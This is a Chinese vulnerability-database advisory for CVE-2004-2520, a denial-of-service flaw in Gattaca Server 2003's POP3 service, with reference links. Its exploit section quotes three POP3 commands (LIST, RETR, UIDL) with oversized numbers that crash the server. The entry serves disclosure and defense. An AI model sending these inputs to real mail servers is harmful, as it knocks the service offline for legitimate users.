Gattaca Server 2003多个服务拒绝漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108052 漏洞类型 其他
发布时间 2004-07-15 更新时间 2006-01-24
CVE编号 CVE-2004-2520 CNNVD-ID CNNVD-200412-1136
漏洞平台 Multiple CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/24283
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1136
|漏洞详情
GattacaServer20031.1.10.0版本的POP3协议存在漏洞。远程认证用户借助(1)LIST,(2)RETR,或者(3)UIDL命令的超大数值导致服务拒绝(应用崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/10728/info
 
It is reported that Gattaca Server 2003 contains multiple denial of service vulnerabilities.
 
These vulnerabilities allow a remote attacker to crash the application, denying service to legitimate users.
 
Version 1.1.10.0 is reported vulnerable. Prior versions may also contain these vulnerabilities as well. 

list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405
|参考资料

来源:www.gattaca-server.com
链接:http://www.gattaca-server.com/cgi-bin/yabb/YaBB.pl?board=gattaca_discussion;action=display;num=1091194176;start=0#0
来源:XF
名称:gattaca-pop3-dos(16703)
链接:http://xforce.iss.net/xforce/xfdb/16703
来源:BID
名称:10728
链接:http://www.securityfocus.com/bid/10728
来源:OSVDB
名称:7925
链接:http://www.osvdb.org/7925
来源:SECTRACK
名称:1010703
链接:http://securitytracker.com/id?1010703
来源:SECUNIA
名称:12071
链接:http://secunia.com/advisories/12071
来源:members.lycos.co.uk
链接:http://members.lycos.co.uk/r34ct/main/Gattaca%20Server%202003.txt